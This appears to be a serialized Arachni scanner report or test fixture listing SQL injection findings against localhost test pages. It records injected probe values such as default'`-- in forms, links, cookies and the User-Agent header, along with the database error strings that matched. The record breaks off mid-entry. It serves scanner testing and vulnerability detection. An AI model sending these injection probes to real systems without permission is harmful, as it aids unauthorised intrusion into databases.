"aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mssql/link/flip?input=default :verification: :id: System.Data.OleDb.OleDbException var: Parameter flip url: http://localhost:7362/mssql/link/flip?input=default injected: '' id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: link remarks: {} method: GET response: ! '["System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server Driver]\n[SQLServer JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed quotation mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft OLE DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before the character string\nSyntax Error (missing operator) in query expression\nData type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC Microsoft Access Driver]\nthe used select statements have different number of columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver stuff Access\nJET Database Engine\nAccess Database Engine\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODg0 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": 
!binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/mssql/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value'`-- :injected: cookie value'`-- :combo: !binary "Y29va2llMg==": cookie value'`-- :action: http://localhost:7362/mssql/cookie/append :verification: :id: System.Data.OleDb.OleDbException var: cookie2 url: http://localhost:7362/mssql/cookie/append injected: cookie value'`-- id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: cookie remarks: {} method: GET response: ! 
'System.Data.OleDb.OleDbException [Microsoft][ODBC SQL Server Driver] [SQLServer JDBC Driver] [SqlException System.Data.SqlClient.SqlException Unclosed quotation mark after the character string ''80040e14'' mssql_query() Microsoft OLE DB Provider for ODBC Drivers Microsoft OLE DB Provider for SQL Server Incorrect syntax near Sintaxis incorrecta cerca de Syntax error in string in query expression Procedure or function ''ColumnSeek'' expects parameter Unclosed quotation mark before the character string Syntax Error (missing operator) in query expression Data type mismatch in criteria expression ADODB.Field (0x800A0BCD) [Microsoft][ODBC Microsoft Access Driver] the used select statements have different number of columns OLE DB stuff SQL Server Warningstuff mssql_ Access stuff Driver Driver stuff Access JET Database Engine Access Database Engine ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value'`-- response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODQ5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mssql/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mssql/cookie/flip 
:verification: :id: System.Data.OleDb.OleDbException var: Parameter flip url: http://localhost:7362/mssql/cookie/flip injected: '' id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: cookie remarks: {} method: GET response: ! '[nil, "System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server Driver]\n[SQLServer JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed quotation mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft OLE DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before the character string\nSyntax Error (missing operator) in query expression\nData type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC Microsoft Access Driver]\nthe used select statements have different number of columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver stuff Access\nJET Database Engine\nAccess Database Engine\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODg0 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL 
code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mssql/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mssql/header/flip :verification: :id: System.Data.OleDb.OleDbException var: Parameter flip url: http://localhost:7362/mssql/header/flip injected: '' id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server Driver]\n[SQLServer JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed quotation mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft OLE DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before the character string\nSyntax Error (missing operator) in query expression\nData type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC Microsoft Access Driver]\nthe used select statements have different number of columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver stuff Access\nJET Database Engine\nAccess Database Engine\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTAyOQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoxNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/mssql/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/mssql/header/append :verification: :id: System.Data.OleDb.OleDbException var: User-Agent url: http://localhost:7362/mssql/header/append injected: arachni_user'`-- id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: header remarks: {} method: GET response: ! 
'System.Data.OleDb.OleDbException [Microsoft][ODBC SQL Server Driver] [SQLServer JDBC Driver] [SqlException System.Data.SqlClient.SqlException Unclosed quotation mark after the character string ''80040e14'' mssql_query() Microsoft OLE DB Provider for ODBC Drivers Microsoft OLE DB Provider for SQL Server Incorrect syntax near Sintaxis incorrecta cerca de Syntax error in string in query expression Procedure or function ''ColumnSeek'' expects parameter Unclosed quotation mark before the character string Syntax Error (missing operator) in query expression Data type mismatch in criteria expression ADODB.Field (0x800A0BCD) [Microsoft][ODBC Microsoft Access Driver] the used select statements have different number of columns OLE DB stuff SQL Server Warningstuff mssql_ Access stuff Driver Driver stuff Access JET Database Engine Access Database Engine ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODQ5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoxOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/emc/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! 
'[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/emc/form/flip :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: Parameter flip url: http://localhost:7362/emc/form/flip injected: '' id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: form remarks: {} method: GET response: ! '["[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/emc/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/emc/form/append :verification: :id: ! 
'[DM_QUERY_E_SYNTAX]' var: input url: http://localhost:7362/emc/form/append injected: default'`-- id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: form remarks: {} method: GET response: ! '[DM_QUERY_E_SYNTAX] has occurred in the vicinity of: ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NTM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/emc/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/emc/link/append?input=default :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: input url: http://localhost:7362/emc/link/append?input=default injected: default'`-- id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: link remarks: {} method: GET response: ! 
'[DM_QUERY_E_SYNTAX] has occurred in the vicinity of: ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NTM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html 